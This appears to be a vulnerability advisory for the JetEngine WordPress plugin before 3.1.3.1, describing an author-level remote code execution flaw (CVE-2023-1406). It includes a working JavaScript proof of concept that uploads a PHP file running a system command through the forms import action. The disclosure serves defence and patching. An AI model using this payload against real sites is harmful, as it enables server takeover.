WordPress Plugin Vulnerabilities

JetEngine < 3.1.3.1 - Author+ Remote Code Execution

Description

The plugin includes uploaded files without adequately ensuring that they are not executable, leading to a remote code execution vulnerability.

Proof of Concept

fetch("/wp-admin/admin.php?action=jet_engine_forms_import", {
  "headers": {
    "accept": "text/html",
    "content-type": "multipart/form-data; boundary=----WebKitFormBoundary5hcKRhxO2OVXJm3s"
  },
  "body": "------WebKitFormBoundary5hcKRhxO2OVXJm3s\r\nContent-Disposition: form-data; name=\"form_file\"; filename=\"poc.php\"\r\nContent-Type: application/json\r\n\r\n<?php die(system('id'));\r\n------WebKitFormBoundary5hcKRhxO2OVXJm3s--\r\n",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text()).then((data) => console.log(data));

Affects Plugins

Plugin icon
jet-engine
Fixed in 3.1.3.1

References

CVE
CVE-2023-1406

Classification

Type
RCE
OWASP top 10
A1: Injection
CWE
CWE-94
CVSS
7.2 (high)

Miscellaneous

Original Researcher
R3zk0n
Submitter
Luke Symons
Submitter website
https://x64.sh
Submitter twitter
Rezk0n
Verified
Yes
WPVDB ID
2a81b6b1-2339-4889-9c28-1af133df8b65

Timeline

Publicly Published
2023-03-20 (about 1 years ago)
Added
2023-03-20 (about 1 years ago)
Last Updated
2023-03-20 (about 1 years ago)

Other

Published
Title
Published
2022-11-30
Title
Easy WP SMTP < 1.5.2 - Admin+ RCE
Published
2018-11-11
Title
Simple Link Directory < 5.6.0 - Authenticated PHP Object Injection
Published
2023-09-26
Title
Ni Purchase Order(PO) For WooCommerce < 1.2.2 - Admin+ File Upload to Remote Code Execution
Published
2014-11-20
Title
CM Download Manager < 2.0.4 - Unauthenticated Code Injection
Published
2014-08-01
Title
GeoPlaces - File Upload H&ling Remote Comm& Execution